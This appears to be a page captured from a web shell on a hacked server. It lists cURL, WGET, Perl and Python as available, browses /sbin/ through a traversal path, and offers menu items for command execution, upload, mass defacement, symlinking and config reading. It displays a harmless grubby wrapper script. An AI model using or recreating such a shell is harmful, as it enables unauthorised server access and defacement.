OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0555) : /python/../python/../python/lib/python3.9/html/../pydoc_data/../pydoc_data/../../../../sbin/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
#!/bin/bash if [[ -x /usr/libexec/grubby/grubby-bls ]] ; then exec /usr/libexec/grubby/grubby-bls "${@}" elif [[ -x /usr/libexec/grubby/grubby ]] ; then exec /usr/libexec/grubby/grubby "${@}" fi echo "Grubby is not installed correctly." >>/dev/stderr exit 1